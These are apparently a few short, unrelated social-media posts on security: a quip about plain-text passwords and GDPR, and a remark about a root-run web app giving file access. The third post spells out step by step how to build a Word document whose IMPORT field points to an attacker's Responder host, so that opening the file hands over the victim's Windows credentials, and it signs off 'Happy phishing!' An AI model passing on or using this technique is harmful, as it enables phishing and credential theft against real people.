Funny, I thought storing plain text passwords was a violation of #GDPR
Of course they did.
Submitted this to MSRC, won't patch, it's a "feature"; Open Word -> CTRL + F9 -> IMPORT "\\\\Responder-IP\\1.jpg" -> right click and select "Edit Field" -> tick "Data not stored in document" -> save & close. Open the document -> free credentials :) Happy phishing!
Couldn’t get in through SSH or a reverse shell, but when you have a web app installed that runs as root and lets you view/edit all files on the machine, might as well have.